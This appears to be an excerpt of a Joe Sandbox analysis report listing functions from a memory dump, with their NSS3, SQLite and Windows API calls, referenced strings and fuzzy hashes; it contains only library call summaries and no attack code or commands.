free.MOZGLUE(00000000), ref: 6C7D25BB
free.MOZGLUE(00000000), ref: 6C7D25CA

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ByteCharMultiWidefree$Alloc_UtilValue_waccessmalloc
String ID:
API String ID: 3520324648-0
Opcode ID: 65693a8e542a09bc95ede4439cf9ef7813fa84943a6817462241dc3480371755
Instruction ID: 758265e532629a67938357f826e3db26d921ef170cc1017ee3515e5512cce4ab
Opcode Fuzzy Hash: 65693a8e542a09bc95ede4439cf9ef7813fa84943a6817462241dc3480371755
Instruction Fuzzy Hash: 9601F5B17052017BFF2027759D1DE7B365CDB426A9F160130BC2AC5A82E960ED0186F1

Function 6C8886C0 Relevance: 9.1, APIs: 6, Instructions: 54threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C8886DE

Part of subcall function 6C760F00: PR_GetPageSize.NSS3(6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F1B
Part of subcall function 6C760F00: PR_NewLogModule.NSS3(clock,6C760936,FFFFE8AE,?,6C6F16B7,00000000,?,6C760936,00000000,?,6C6F204A), ref: 6C760F25

PR_Lock.NSS3 ref: 6C888700

Part of subcall function 6C839BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C761A48), ref: 6C839BB3
Part of subcall function 6C839BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C761A48), ref: 6C839BC8

getprotobyname.WSOCK32(?), ref: 6C888709
GetLastError.KERNEL32(?), ref: 6C888717
PR_GetCurrentThread.NSS3(?,?), ref: 6C88871F
PR_Unlock.NSS3(?,?), ref: 6C88873A

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobyname
String ID:
API String ID: 2388724134-0
Opcode ID: 3d646b30eda931f96d5b37dd4b7a2609e3389602d42d5bf47a42b31572abe7fe
Instruction ID: 97b0501dcc1df3c5c62f4fcbf1fb9b8e0a089de56c58d440f37c7169d485900d
Opcode Fuzzy Hash: 3d646b30eda931f96d5b37dd4b7a2609e3389602d42d5bf47a42b31572abe7fe
Instruction Fuzzy Hash: AD11E176A251309BCB30AFB9AA4458A3674AF46338F064776EC0997FA1C7309C05CBC5

Function 6C75C4E0 Relevance: 9.1, APIs: 6, Instructions: 52COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C75C4F0
free.MOZGLUE ref: 6C75C51A
TlsSetValue.KERNEL32 ref: 6C75C540
free.MOZGLUE ref: 6C75C557
DeleteCriticalSection.KERNEL32 ref: 6C75C56A
free.MOZGLUE ref: 6C75C576

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$Value$CriticalDeleteSection
String ID:
API String ID: 195087141-0
Opcode ID: 977c79c474ed78e79455b068bbc1b1867301c070462b14973abd270e6e1932b0
Instruction ID: bf3c237f93dbe0c20af0ed2b862fb1aab7296738b6202d1f2fb4496c4e121dc4
Opcode Fuzzy Hash: 977c79c474ed78e79455b068bbc1b1867301c070462b14973abd270e6e1932b0
Instruction Fuzzy Hash: 7A114FB4504B008BDB20BF79C14C25ABBF4BF45749F45093DD8C683A01EB309555CBC2

Function 6C77E520 Relevance: 9.0, APIs: 6, Instructions: 43COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(00000000,?,?,6C787F5D,00000000,00000000,?,?,?,6C7880DD), ref: 6C77E532

Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390AB
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C8390C9
Part of subcall function 6C839090: EnterCriticalSection.KERNEL32 ref: 6C8390E5
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839116
Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C83913F

PR_EnterMonitor.NSS3(6C7880DD), ref: 6C77E549

Part of subcall function 6C839090: LeaveCriticalSection.KERNEL32 ref: 6C8391AA
Part of subcall function 6C839090: TlsGetValue.KERNEL32 ref: 6C839212
Part of subcall function 6C839090: _PR_MD_WAIT_CV.NSS3 ref: 6C83926B

PR_ExitMonitor.NSS3 ref: 6C77E56D
PL_HashTableDestroy.NSS3 ref: 6C77E57B

Part of subcall function 6C77E190: PR_EnterMonitor.NSS3(?,?,6C77E175), ref: 6C77E19C
Part of subcall function 6C77E190: PR_EnterMonitor.NSS3(6C77E175), ref: 6C77E1AA
Part of subcall function 6C77E190: PR_ExitMonitor.NSS3 ref: 6C77E208
Part of subcall function 6C77E190: PL_HashTableRemove.NSS3(?), ref: 6C77E219
Part of subcall function 6C77E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C77E231
Part of subcall function 6C77E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C77E249
Part of subcall function 6C77E190: PR_ExitMonitor.NSS3 ref: 6C77E257

PR_ExitMonitor.NSS3(6C7880DD), ref: 6C77E5B5
PR_DestroyMonitor.NSS3 ref: 6C77E5C3

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Monitor$Enter$ExitValue$CriticalSection$Arena_DestroyFreeHashLeaveTableUtil$Remove
String ID:
API String ID: 3740585915-0
Opcode ID: 22d5383a2a91b5e4c906a338a55f38b63aad938f940920ff5e8e9e44d2cc8276
Instruction ID: 349d180b109a5c4410498aefe37a0bfc775667e0ba60655e1e22c4eb92317ab9
Opcode Fuzzy Hash: 22d5383a2a91b5e4c906a338a55f38b63aad938f940920ff5e8e9e44d2cc8276
Instruction Fuzzy Hash: 19016DB0E201988BEF309B68EE056953BB5F74234CF002136DC18A1A22FB317559EBC2

Function 6C75AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C75AFDA

Strings

misuse, xrefs: 6C75AFCE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C75AFC4
unable to delete/modify collation sequence due to active statements, xrefs: 6C75AF5C
%s at line %d of [%.10s], xrefs: 6C75AFD3

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: e4c425fbf38fac8fae3911cf420a5bc8b9a3d5897ae6c79344fe79a391e8102d
Instruction ID: 1b702d19bb83ea1c6f156951525cd24a45d974971fe446a92ae4049b8277810f
Opcode Fuzzy Hash: e4c425fbf38fac8fae3911cf420a5bc8b9a3d5897ae6c79344fe79a391e8102d
Instruction Fuzzy Hash: 4391E171B012158FDB04CF59CA50ABABBF1BF45324F5984B8E864AB791CB31EC11CBA0

Function 6C6FE6D0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 194COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6C6FE81D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010966,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C6FDB91,?,?), ref: 6C6FE8E7

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6FE8C5, 6C6FE8D1, 6C6FE8F9, 6C6FE905, 6C6FE911, 6C6FE91D, 6C6FE929, 6C6FE935
database corruption, xrefs: 6C6FE8DB
%s at line %d of [%.10s], xrefs: 6C6FE8E0

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memsetsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 3107271255-598938438
Opcode ID: 15fd737d7cb1c626efee357fa18b94224362f67051e8dd16d0b82f7cd065b05f
Instruction ID: 26b368c0e1ca42c5c5b982ba63a7fbb2fdfd2e5060667f2229f8cf97dacb171c
Opcode Fuzzy Hash: 15fd737d7cb1c626efee357fa18b94224362f67051e8dd16d0b82f7cd065b05f
Instruction Fuzzy Hash: 3371A071D042299FCB14CF9DC490AEEBBF2AF09314F14456AE864BBB41D374A942CBA5

Function 6C6FE4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6FE53A
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C6FE5BC

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6FE525, 6C6FE596, 6C6FE5A7
database corruption, xrefs: 6C6FE52F, 6C6FE5B1
%s at line %d of [%.10s], xrefs: 6C6FE534, 6C6FE5B6

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: e8e4729ad7292eed3d535cf1d7a6c875e31938b5a974bfeeaf728bda71c0d1da
Instruction ID: 57b3e45595140f57b7eff720064064d7ffe13f4ba356cb96ed6bb80527629b59
Opcode Fuzzy Hash: e8e4729ad7292eed3d535cf1d7a6c875e31938b5a974bfeeaf728bda71c0d1da
Instruction Fuzzy Hash: AB313A306407159BC322CE9DC88096ABBA2EF45714B540D7DE458A7B41F376E94BC3E4

Function 6C776420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C775DEF,?,?,?), ref: 6C776456
CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C775DEF,?,?,?), ref: 6C776476
CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C775DEF,?,?,?), ref: 6C7764A0
PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C775DEF,?,?,?), ref: 6C7764C2

Strings

]wl, xrefs: 6C776489

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CertificateError$DestroyTemp
String ID: ]wl
API String ID: 3886907618-1799454423
Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction ID: e1bba658107f98565a8018aba8c0b767018561cd3d44a4e3b83e429f08f132db
Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
Instruction Fuzzy Hash: 0021E7B1A003196BEF309F68DD09B6376E8AB40308F144938F529C6B45E7B2D768C7B1

Function 6C7C4590 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(00000008,?,6C7C473B,00000000,?,6C7B7A4F,?), ref: 6C7C459B

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

TlsGetValue.KERNEL32(?,?,6C7C473B,00000000,?,6C7B7A4F,?), ref: 6C7C45BF
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7C473B,00000000,?,6C7B7A4F,?), ref: 6C7C45D3
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C7C473B,00000000,?,6C7B7A4F,?), ref: 6C7C45E8

Strings

Oz{l, xrefs: 6C7C4594

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$Alloc_CriticalEnterSectionUnlockUtilmalloc
String ID: Oz{l
API String ID: 2963671366-865793983
Opcode ID: a7471a558bf16fd35812be7395ef0f627357bcb867c30a1f431b2b9d53f2b608
Instruction ID: 12c867fc235cfe1dca52121c8b6ffa3e2ce88b55b331beafdf776e2bda147f02
Opcode Fuzzy Hash: a7471a558bf16fd35812be7395ef0f627357bcb867c30a1f431b2b9d53f2b608
Instruction Fuzzy Hash: EB217FB4B00206AFDB109F69DE495AABBB4FF09319F004539E849D7A11E731E964CBD2

Function 6C760DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C760BDE), ref: 6C760DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C760BDE), ref: 6C760DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C760BDE), ref: 6C760DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C760BDE), ref: 6C760E32

Strings

%s incr => %d (find lib), xrefs: 6C760E2D

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 305e507e4c6c491c3b35fb4ec9ab946a534ca960af33628913295ae2d31ebab8
Instruction ID: 241008958fb5cad3926823393d74f962153727fdf850e9276bfb0288546f6175
Opcode Fuzzy Hash: 305e507e4c6c491c3b35fb4ec9ab946a534ca960af33628913295ae2d31ebab8
Instruction Fuzzy Hash: 7E019E726016249FE6209F2ADD49A1773ACDF45B09B0548B9ED09D3E42E761FC1487E1

Function 6C7C4760 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,6C7B7A47,?), ref: 6C7C477E

Part of subcall function 6C7C4470: TlsGetValue.KERNEL32(00000000,?,6C787296,00000000), ref: 6C7C4487
Part of subcall function 6C7C4470: EnterCriticalSection.KERNEL32(?,?,?,6C787296,00000000), ref: 6C7C44A0
Part of subcall function 6C7C4470: PR_Unlock.NSS3(?,?,?,?,6C787296,00000000), ref: 6C7C44BB

TlsGetValue.KERNEL32(00000000,?,6C7B7A47,?), ref: 6C7C478E
EnterCriticalSection.KERNEL32(?,?,?,6C7B7A47,?), ref: 6C7C47A3
PR_Unlock.NSS3(?,?,?,?,6C7B7A47,?), ref: 6C7C47B8

Strings

Gz{l, xrefs: 6C7C4769

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$DestroyModule
String ID: Gz{l
API String ID: 342238404-4130266960
Opcode ID: a3c5509845cad15fb2c52546a577e87dd1b1626a39414fd1538b12226b1742c1
Instruction ID: ff9d77654877c76a99fed8918bd2bd605c2ef0aee2fa8d80fd329bc867afb207
Opcode Fuzzy Hash: a3c5509845cad15fb2c52546a577e87dd1b1626a39414fd1538b12226b1742c1
Instruction Fuzzy Hash: 5E0179B4A046029FDB10AF39D64856ABBF4BF0635DF054969DC8887A01E730E8A4CBD2

Function 6C7E85A0 Relevance: 7.7, APIs: 5, Instructions: 209COMMON

Download Yara Rule

APIs

SECKEY_SignatureLen.NSS3(?), ref: 6C7E86AD
SECKEY_SignatureLen.NSS3(?), ref: 6C7E86D0

Part of subcall function 6C782340: PL_InitArenaPool.NSS3(?,security,00000090,00000008), ref: 6C782387
Part of subcall function 6C782340: PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C782391
Part of subcall function 6C782340: PORT_Alloc_Util.NSS3(00000000), ref: 6C7823AA
Part of subcall function 6C782340: SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C899F14,?), ref: 6C7823D2
Part of subcall function 6C782340: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7823E1
Part of subcall function 6C782340: PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7823F5
Part of subcall function 6C782340: PL_FreeArenaPool.NSS3(?), ref: 6C782407

PK11_VerifyWithMechanism.NSS3(?,00000011,00000000,?,?,?), ref: 6C7E87B5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7E87C9
PR_SetError.NSS3(FFFFD057,00000000), ref: 6C7E880B

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Item_$Alloc_ArenaPoolSignatureZfree$CallDecodeErrorFreeInitK11_MechanismOnceQuickVerifyWith
String ID:
API String ID: 4115714656-0
Opcode ID: 716a75890981264d30c9c9e3a27ac3a1f0ad368ba9f327ffab2a4b296119ad2b
Instruction ID: d0ab32ccdf5e78fe166fc53e9ab0ab30308298eac7e98ebf4d8f2ca498aa8d35
Opcode Fuzzy Hash: 716a75890981264d30c9c9e3a27ac3a1f0ad368ba9f327ffab2a4b296119ad2b
Instruction Fuzzy Hash: 6E81A172E001099FDF04CF98DA94BAE77B1EB49318F24403AE919AB781D731ED01CB91

Function 6C7BC590 Relevance: 7.7, APIs: 5, Instructions: 155COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C7BC5C7
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C7BC603
PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C7BC636
PK11_FreeSymKey.NSS3(?), ref: 6C7BC6D7
PK11_FreeSymKey.NSS3(?), ref: 6C7BC6E1

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439739367.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439785281.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439807970.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439829978.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2439853968.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: K11_$DoesMechanism$Free
String ID:
API String ID: 3860933388-0
Opcode ID: a79781f0bdb61721d8d07cd1766fbe289ab8c1ae8107141fc13bd2a278baa033
Instruction ID: ee56d6a53853c71b63901b0ddd4d969b2ec89902346d2bde369a01b625a0e297
Opcode Fuzzy Hash: a79781f0bdb61721d8d07cd1766fbe289ab8c1ae8107141fc13bd2a278baa033
Instruction Fuzzy Hash: F64162B560120AAFDB01AF69DD85DAB77A9EF1834DB504038FD08E7710E731E925CBA1

Function 6C7D4690 Relevance: 7.6, APIs: 5, Instructions: 116memoryCOMMON

Download Yara Rule

APIs

PORT_ZAlloc_Util.NSS3(00000001,00000000,00000000,6C8C0148,?,6C7873A4,?,00000027,00000022), ref: 6C7D46D9
PORT_ZAlloc_Util.NSS3(00000001,00000022), ref: 6C7D473E
free.MOZGLUE(00000000,?,00000022), ref: 6C7D476C
free.MOZGLUE(00000000,?,00000022), ref: 6C7D477A
PORT_Strdup_Util.NSS3(6C8C0148,00000000,00000000,6C8C0148,?,6C7873A4,?,00000027,00000022), ref: 6C7D4788

Memory Dump Source

Source File: 00000000.00000002.2439592949.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2439566732.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
